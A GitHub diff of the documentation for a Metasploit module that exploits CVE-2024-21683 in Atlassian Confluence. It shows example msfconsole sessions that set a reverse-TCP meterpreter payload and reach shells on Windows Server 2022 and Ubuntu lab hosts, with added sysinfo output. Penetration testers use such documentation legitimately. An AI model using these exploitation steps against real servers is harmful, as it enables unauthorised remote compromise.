File tree Expand file tree Collapse file tree 1 file changed +16
-3
lines changed
documentation/modules/exploit/multi/http Expand file tree Collapse file tree 1 file changed +16
-3
lines changed Original file line number Diff line number Diff line change @@ -38,7 +38,7 @@ The known Confluence administrator password.
38
38
39
39
## Scenarios
40
40
41
- ### Windows Target
41
+ ### Windows Server 2022 (10.0 Build 20348)
42
42
```
43
43
msf6 exploit(multi/http/atlassian_confluence_rce_cve_2024_21683) > set payload cmd/windows/http/x64/meterpreter/reverse_tcp
44
44
payload => cmd/windows/http/x64/meterpreter/reverse_tcp
@@ -87,10 +87,17 @@ meterpreter > getuid
87
87
Server username: SRV01\Administrator
88
88
meterpreter > pwd
89
89
C:\Program Files\Atlassian\Confluence\bin
90
- meterpreter >
90
+ meterpreter > sysinfo
91
+ Computer : SRV01
92
+ OS : Windows Server 2022 (10.0 Build 20348).
93
+ Architecture : x64
94
+ System Language : en_US
95
+ Domain : WORKGROUP
96
+ Logged On Users : 1
97
+ Meterpreter : x64/windows
91
98
```
92
99
93
- ### Linux Target
100
+ ### Ubuntu 22.04 ( Linux 6.5.0-41-generic)
94
101
```
95
102
msf6 exploit(multi/http/atlassian_confluence_rce_cve_2024_21683) > set ADMIN_USER admin
96
103
ADMIN_USER => admin
@@ -129,5 +136,11 @@ meterpreter > getuid
129
136
Server username: confluence
130
137
meterpreter > pwd
131
138
/atlassian-confluence-8.9.0
139
+ meterpreter > sysinfo
140
+ Computer : 192.168.156.133
141
+ OS : Ubuntu 22.04 (Linux 6.5.0-41-generic)
142
+ Architecture : x64
143
+ BuildTuple : x86_64-linux-musl
144
+ Meterpreter : x64/linux
132
145
meterpreter >
133
146
```
You can’t perform that action at this time.
0 commit comments